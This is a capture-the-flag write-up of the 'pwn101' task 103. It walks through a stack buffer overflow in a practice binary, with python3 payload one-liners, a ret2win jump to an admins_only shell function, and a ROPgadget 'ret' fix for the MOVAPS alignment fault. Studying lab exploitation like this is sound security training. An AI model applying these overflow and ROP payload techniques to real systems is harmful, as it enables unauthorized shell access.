How to exploit 103 task from the room pwn101 ?
python3 -c "open('payload','wb').write(b'A'*32 + b'B'*8 + b'\xec\x16\x40\x00\x00\x00\x00\x00' + b'\x54\x15\x40\x00\x00\x00\x00\x00')"
(echo "3\n"; cat payload; cat) | ./pwn103.pwn103
Why ?
begin with the begining, find the vector:
- check the first input
- check the others possibilities of the menu
so, let's check the first input after the try of adding a lot of 'A' we don't find the vector here now, let check the others menu:
- Announcements: juste some text so not input
- Rules: same as Announcements
- Général: check with a lot of 'A' and let's go ! we find the enter !
now, let's exploit !
find the size of the buffer
we're going to find the size of the buffer by using msf-pattern
and gdb-peda
msf-pattern_create -l 100
then run gdb peda:
the use msf-patter_offset:
msf-pattern_offset -q 0x4132624131624130
find interesting functions
and we find that the buffer has a size of 32 or 0x20 bytes now, we have to find how to exploit let's open cutter to find some intersting funtions or others:
so, we finds the function admins_only who give a shell a the adress 0x00401554
now we have all to exploit:
- buffer size
- function to call
let's build the exploit !
payload = buffer_size + 8bytes to write into the RSP registre + admins_only adress
let's try it !
python3 -c "open('payload','wb').write(b'A'*32 + b'B'*8 + b'\x54\x15\x40\x00\x00\x00\x00\x00')"
(echo "3\n"; cat payload; cat) | ./pwn103.pwn103
saddly, it's didn't work...
So why ?!
it's because the movaps issue: link to a ressource
the solution from the website:
The MOVAPS issue
If you're segfaulting on a movaps instruction in buffered_vfprintf() or do_system() in the x86_64 challenges, then ensure the stack is 16-byte aligned before returning to GLIBC functions such as printf() or system(). Some versions of GLIBC uses movaps instructions to move data onto the stack in certain functions. The 64 bit calling convention requires the stack to be 16-byte aligned before a call instruction but this is easily violated during ROP chain execution, causing all further calls from that function to be made with a misaligned stack. movaps triggers a general protection fault when operating on unaligned data, so try padding your ROP chain with an extra ret before returning into a function or return further into a function to skip a push instruction.
so, let's find a ret intruction and add it into our payload
find a ret instruction
let's use ROPgadget
to find a ret instruction:
ROPgadget --binary pwn103.pwn103 | grep ret
so let's add 0x0000000000401016
to the payload
new payload = buffer_size + 8bits to write into the RSP registre + ret_adress + admins_only adress
python3 -c "open('payload','wb').write(b'A'*32 + b'B'*8 + b'\xec\x16\x40\x00\x00\x00\x00\x00' + b'\x54\x15\x40\x00\x00\x00\x00\x00')"
(echo "3\n"; cat payload; cat) | ./pwn103.pwn103
GG !
After viewing a stream of topklean i see another solution without bypass the MOVAPS issue:
python3 -c "open('payload','wb').write(b'A'*32 + b'B'*8 + b'\x7a\x15\x40\x00\x00\x00\x00\x00')"
(echo "3\n"; cat payload; cat) | ./pwn103.pwn103